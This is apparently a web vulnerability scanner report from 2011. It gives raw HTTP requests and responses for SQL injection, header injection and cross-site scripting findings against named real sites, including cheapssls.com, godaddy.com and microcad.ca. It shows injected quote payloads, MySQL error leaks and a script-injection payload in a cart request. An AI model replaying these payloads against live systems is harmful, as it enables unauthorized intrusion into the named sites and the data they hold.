POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com Content-Length: 747 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:49:38 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=pkocsogmbaf1 Set-Cookie: stat_uniq_code=51f1b%250d X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:49:38 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com Content-Length: 747 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:49:42 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:49:41 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com Content-Length: 758 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:49:21 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=rbvfnqfkmjp3 Set-Cookie: stat_uniq_code=134386 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:49:21 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Proxy-Connection: keep-alive Referer: http://www.cheapssls.com Content-Length: 758 Origin: http://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=http%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:49:25 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:49:24 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | https://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 486 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1' Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 22:10:56 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=7uv22qlq49s5 Set-Cookie: stat_uniq_code=134386%27 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 22:10:56 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 486 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1'' Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 22:10:58 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 22:10:57 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | https://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 486 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:58:29 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=s5n3ao5d0ilo Set-Cookie: stat_uniq_code=134386+and X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:58:28 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 486 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:58:31 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:58:31 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | https://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 486 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:50:27 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=m7sdcbeh2rbh Set-Cookie: stat_uniq_code=51f1b%250d X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:50:27 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 486 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:50:30 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:50:29 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | https://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 485 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:53:18 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=g6klbngno3a2 Set-Cookie: stat_uniq_code=51f1b%250d X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:53:17 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 485 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:53:20 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:53:19 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | https://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 485 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:55:28 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=10es6k81pc1o Set-Cookie: stat_uniq_code=134386+and X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:55:28 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 485 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:55:30 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:55:29 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | https://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 485 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:55:03 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=oeriroaec2ic Set-Cookie: stat_uniq_code=134386+and X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:55:02 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 485 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:55:06 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:55:05 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | https://www.cheapssls.com |
Path: | /index.php |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 486 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:49:20 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 Set-Cookie: sess_id=5kmg5l9v8a0j Set-Cookie: stat_uniq_code=51f1b%250d X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:49:20 GMT Content-Length: 168 {text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }} |
POST /index.php?dispatch Host: www.cheapssls.com Connection: keep-alive Referer: https://www.cheapssls.com Content-Length: 486 Origin: https://www.cheapssls.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: application/json, text/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sess_id=ne5f0cvav2ks ve%5Burl%5D=https%3A%2F ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: application/json Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sat, 03 Sep 2011 21:49:24 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 21:49:23 GMT Content-Length: 44 {text: '', data : { 'notifications': [ ] }} |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.godaddy.com |
Path: | /gdshop/offers/cross_sell |
GET /gdshop/offers/cross_sell Host: www.godaddy.com Proxy-Connection: keep-alive Referer: http://www.godaddy.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/html Expires: Wed, 01 Jan 1997 12:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/ Set-Cookie: currency1=potableSou Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/ Set-Cookie: traffic=server=M1PWC X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sat, 03 Sep 2011 21:49:51 GMT Content-Length: 275694 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <title>Low cost domain names, domain transfers, web hosting, email accounts, and so much more.</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta http-equiv="Pragma" content="no-cache"> <meta name="description" content="Register & transfer domains for less. Reliable hosting. Easy-to-use site builders. Affordable SSL certificates. eCommerce solutions. ICANN-accredited."> <meta name="keywords" content="domain name, domain registration, registrar, renewal, transfer domain, cheap, inexpensive, domain, register, DNS, URL, web address, internet address, web site name, bulk domain registration, buy domain, private domain registration, bulk price, .com, .net, .org, Go Daddy.com, Go Daddy, godaddy.com, godaddy"> <link rel="shortcut icon" href="http://imagesak <link rel="stylesheet" type="text/css" href="http://img2.wsimg ...[SNIP]... |
GET /gdshop/offers/cross_sell Host: www.godaddy.com Proxy-Connection: keep-alive Referer: http://www.godaddy.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/html Expires: Wed, 01 Jan 1997 12:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/ Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/ Set-Cookie: traffic=server=M1PWC X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sat, 03 Sep 2011 21:49:53 GMT Content-Length: 275694 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <head> <title>Low cost domain names, domain transfers, web hosting, email accounts, and so much more.</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta http-equiv="Pragma" content="no-cache"> <meta name="description" content="Register & transfer domains for less. Reliable hosting. Easy-to-use site builders. Affordable SSL certificates. eCommerce solutions. ICANN-accredited."> <meta name="keywords" content="domain name, domain registration, registrar, renewal, transfer domain, cheap, inexpensive, domain, register, DNS, URL, web address, internet address, web site name, bulk domain registration, buy domain, private domain registration, bulk price, .com, .net, .org, Go Daddy.com, Go Daddy, godaddy.com, godaddy"> <link rel="shortcut icon" href="http://imagesak <link rel="stylesheet" type="text/css" href="http://img2.wsimg <style type="text/css"> ul.bul ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.microcad.ca |
Path: | /cart/add/ |
POST /cart/add/ HTTP/1.1 Host: www.microcad.ca Proxy-Connection: keep-alive Referer: http://www.microcad.ca Content-Length: 31 Cache-Control: max-age=0 Origin: http://www.microcad.ca User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: public=mrff84dil681s quantity=1&productid |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 21:36:32 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1212 Content-Type: text/html ACCEPT-RANGES: none <div style="border:1px solid #990000;padding-left:20px <h4>A PHP Error was encountered</h4> <p>Severity: Notice</p> <p>Message: Undefined index: 1011956760'</p> <p>Filename: mo ...[SNIP]... ctdescriptions pd2 ON (p.productid = pd2.productid AND pd2.type = '3' AND pd2.localeid = '3') JOIN manufacturer m ON (p.manufacturerid = m.manufacturerid) WHERE p.productid = '1011956760'' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1011956760''' at line 7 |
Severity: | High |
Confidence: | Firm |
Host: | http://www.microcad.ca |
Path: | /products/details/McAfee |
GET /products/details/McAfee Host: www.microcad.ca Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 21:28:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 226 Content-Type: text/html ACCEPT-RANGES: none You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND an.localeid = '3' AND hn.localeid = '3' AND pa.localeid = '3' ORDE' at line 7 |
Severity: | High |
Confidence: | Certain |
Host: | http://www.microcad.ca |
Path: | /cart |
POST /cart/add/ HTTP/1.1 Host: www.microcad.ca Proxy-Connection: keep-alive Referer: http://www.microcad.ca Content-Length: 31 Cache-Control: max-age=0 Origin: http://www.microcad.ca User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Content-Type: application/x-www-form Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: public=mrff84dil681s quantity=1&productid=1542d'><script>alert(1)< |
GET /cart HTTP/1.1 Host: www.microcad.ca Proxy-Connection: keep-alive Referer: http://www.microcad.ca Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: public=mrff84dil681s |
